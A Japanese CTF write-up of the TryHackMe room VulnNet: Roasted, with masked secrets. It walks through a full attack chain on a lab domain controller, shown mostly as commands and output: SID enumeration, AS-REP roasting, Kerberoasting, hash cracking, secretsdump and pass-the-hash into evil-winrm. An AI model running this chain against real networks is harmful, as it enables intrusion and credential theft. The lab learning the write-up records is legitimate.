一部を■で隠しています。
…えー、正直全く分からなかったのでWriteupを激読みしてます。
Writeups
- vulnnet_roasted/README.md at main · siddicky/vulnnet_roasted · GitHub
- TryHackMe | VulnNet:Roasted. A room on TryHackMe created by… | by FarisArch | May, 2021 | Medium
- VulnNet: Roasted writeup. I state that in this writeup the… | by prv | May, 2021 | Medium
- VulnNet : roasted – Write Up – Fr – TryHackMe
- Tryhackme/VulnNet: Roasted.md at main · thedz34/Tryhackme · GitHub
- Tryhackme-Writeups/VulnNet_Roasted Writeup at main · kartikeyj96/Tryhackme-Writeups · GitHub
- TryHackMe VulnNet - Roasted Writeup | sidchn
- write-ups/VulnNet-Roasted.md at main · r3vshell/write-ups · GitHub
- [THM] VulnNet: Roated – Blog
こういう情報があったら、これを試すということだけは分かった。
正直なんもわかってない。
第一段階:とあるユーザーのクレデンシャルを奪う
まずはnmap
$ nmap -sC -sV -Pn -n -A $IP Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-01 22:24 JST Nmap scan report for 10.10.240.239 Host is up (0.33s latency). Not shown: 989 filtered ports PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-06-01 13:24:57Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped Service Info: Host: WIN-2BO8M1OE1M1; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: 4s | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2021-06-01T13:25:27 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 103.74 seconds
kerberos, ldap, ds, smb, … 色々ありますね…
色々スキャンして散策していくと、kerberos認証で攻撃が刺さるっぽい。
kerberos
まずはユーザー一覧を持ってくる。
$ python3 /usr/share/doc/python3-impacket/examples/lookupsid.py anonymous@$IP Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation Password: [*] Brute forcing SIDs at 10.10.240.239 [*] StringBinding ncacn_np:10.10.240.239[\pipe\lsarpc] [*] Domain SID is: S-1-5-21-1589833671-435344116-4136949213 498: VULNNET-RST\Enterprise Read-only Domain Controllers (SidTypeGroup) 500: VULNNET-RST\Administrator (SidTypeUser) 501: VULNNET-RST\Guest (SidTypeUser) 502: VULNNET-RST\krbtgt (SidTypeUser) 512: VULNNET-RST\Domain Admins (SidTypeGroup) 513: VULNNET-RST\Domain Users (SidTypeGroup) 514: VULNNET-RST\Domain Guests (SidTypeGroup) 515: VULNNET-RST\Domain Computers (SidTypeGroup) 516: VULNNET-RST\Domain Controllers (SidTypeGroup) 517: VULNNET-RST\Cert Publishers (SidTypeAlias) 518: VULNNET-RST\Schema Admins (SidTypeGroup) 519: VULNNET-RST\Enterprise Admins (SidTypeGroup) 520: VULNNET-RST\Group Policy Creator Owners (SidTypeGroup) 521: VULNNET-RST\Read-only Domain Controllers (SidTypeGroup) 522: VULNNET-RST\Cloneable Domain Controllers (SidTypeGroup) 525: VULNNET-RST\Protected Users (SidTypeGroup) 526: VULNNET-RST\Key Admins (SidTypeGroup) 527: VULNNET-RST\Enterprise Key Admins (SidTypeGroup) 553: VULNNET-RST\RAS and IAS Servers (SidTypeAlias) 571: VULNNET-RST\Allowed RODC Password Replication Group (SidTypeAlias) 572: VULNNET-RST\Denied RODC Password Replication Group (SidTypeAlias) 1000: VULNNET-RST\WIN-2BO8M1OE1M1$ (SidTypeUser) 1101: VULNNET-RST\DnsAdmins (SidTypeAlias) 1102: VULNNET-RST\DnsUpdateProxy (SidTypeGroup) 1104: VULNNET-RST\enterprise-core-vn (SidTypeUser) 1105: VULNNET-RST\a-whitehat (SidTypeUser) 1109: VULNNET-RST\t-skid (SidTypeUser) 1110: VULNNET-RST\j-goldenhand (SidTypeUser) 1111: VULNNET-RST\j-leet (SidTypeUser)
ここからユーザー名を抽出してきて、ASREPRoast攻撃していこう。
(SidTypeUser)とあるユーザー名を持ってきて、users.txtという名前で保存して、パスワードハッシュを持ってくる。
$ python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py 'VULNNET-RST/' -usersfile users.txt -no-pass -dc-ip $IP Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation [-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) [-] User WIN-2BO8M1OE1M1$ doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User enterprise-core-vn doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User a-whitehat doesn't have UF_DONT_REQUIRE_PREAUTH set $krb5asrep$23$t-skid@VULNNET-RST:7057a29e0bbc2de8f9699fa612ecc405$7dd804.... [-] User j-goldenhand doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User j-leet doesn't have UF_DONT_REQUIRE_PREAUTH set
なるほど、こうやって取れるのか。John The Ripperでクラックする。
$ john hash.txt --wordlist=/usr/share/dirb/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status ■■■■■■■■■ ($krb5asrep$23$t-skid@VULNNET-RST) 1g 0:00:00:05 DONE (2021-06-01 23:45) 0.1934g/s 614796p/s 614796c/s 614796C/s tjallin3..tj021502 Use the "--show" option to display all of the cracked passwords reliably Session completed
出てきますね…ここからKerberoastingをする?
$ python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py 'VULNNET-RST.local/t-skid:■■■■■■' -outputfile kerb.hash -dc-ip $IP Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation ---------------------- ------------------ ------------------------------------------------------------- -------------------------- -------------------------- ---------- CIFS/vulnnet-rst.local enterprise-core-vn CN=Remote Management Users,CN=Builtin,DC=vulnnet-rst,DC=local 2021-03-12 04:45:09.913979 2021-03-14 08:41:17.987528
なんかでてきた。hashがまた出てくるのでJohnで解析。
$ john kerb.hash --wordlist=/usr/share/dirb/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status ■■■■■■■■■■■ (?) 1g 0:00:00:03 DONE (2021-06-01 23:59) 0.2906g/s 1194Kp/s 1194Kc/s 1194KC/s ryan2k8..ry=i;iiI Use the "--show" option to display all of the cracked passwords reliably Session completed
マジで何やってるか分からん。
アクセスしてフラグを得よう。
$ /opt/evil-winrm/evil-winrm.rb -i $IP -u 'enterprise-core-vn' -p '■■■■■■■■■■'
Evil-WinRM shell v2.4
Info: Establishing connection to remote endpoint
dir
ls
*Evil-WinRM* PS C:\Users\enterprise-core-vn\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\enterprise-core-vn\Desktop> ls
Directory: C:\Users\enterprise-core-vn\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/13/2021 3:43 PM 39 user.txt
*Evil-WinRM* PS C:\Users\enterprise-core-vn\Desktop> cat user.txt
■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■
ok.
第二段階:他のユーザーを探す
新しく手に入れた認証情報を使うとsmbで情報がより引き出せる。
$ smbmap -H $IP -u 'enterprise-core-vn' -p '■■■■■■■■■■■■'
[+] IP: 10.10.240.239:445 Name: 10.10.240.239
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
VulnNet-Business-Anonymous READ ONLY VulnNet Business Sharing
VulnNet-Enterprise-Anonymous READ ONLY VulnNet Enterprise Sharing
smbで入ってみる。
$ smbclient //$IP/SYSVOL --user=enterprise-core-vn%■■■■■■■■■■■■■
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Fri Mar 12 04:19:49 2021
.. D 0 Fri Mar 12 04:19:49 2021
vulnnet-rst.local Dr 0 Fri Mar 12 04:19:49 2021
8771839 blocks of size 4096. 4521966 blocks available
smb: \> pwd
Current directory is \\10.10.240.239\SYSVOL\
smb: \> cd vulnnet-rst.local
smb: \vulnnet-rst.local\> dir
. D 0 Fri Mar 12 04:23:40 2021
.. D 0 Fri Mar 12 04:23:40 2021
DfsrPrivate DHSr 0 Fri Mar 12 04:23:40 2021
Policies D 0 Fri Mar 12 04:20:26 2021
scripts D 0 Wed Mar 17 08:15:49 2021
8771839 blocks of size 4096. 4521966 blocks available
smb: \vulnnet-rst.local\> cd scripts
smb: \vulnnet-rst.local\scripts\> dir
. D 0 Wed Mar 17 08:15:49 2021
.. D 0 Wed Mar 17 08:15:49 2021
ResetPassword.vbs A 2821 Wed Mar 17 08:18:14 2021
8771839 blocks of size 4096. 4521886 blocks available
smb: \vulnnet-rst.local\scripts\> more ResetPassword.vbs
strUserNTName = "a-whitehat"
strPassword = "■■■■■■■■■■■■■■■■"
別のユーザーの認証情報が書いてある…
これを使うとSAMデータベースが抜ける…why...
$ python3 /usr/share/doc/python3-impacket/examples/secretsdump.py a-whitehat@$IP Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation Password: [*] Target system bootKey: 0xf10a2788aef5f622149a41b2c745f49a [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:■■■■■■■■■■■■■■■■■■■■■::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information. [*] Dumping cached domain logon information (domain/username:hash)
これでAdministrator接続ができる。
$ /opt/evil-winrm/evil-winrm.rb -i $IP -u Administrator -H ■■■■■■■■■■■■■■■■■■■■■
Evil-WinRM shell v2.4
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/13/2021 3:34 PM 39 system.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat system.txt
■■■■■■■■■■■■■■■■■■■■■■
背景知識が無さ過ぎたが、軌跡として書いた。
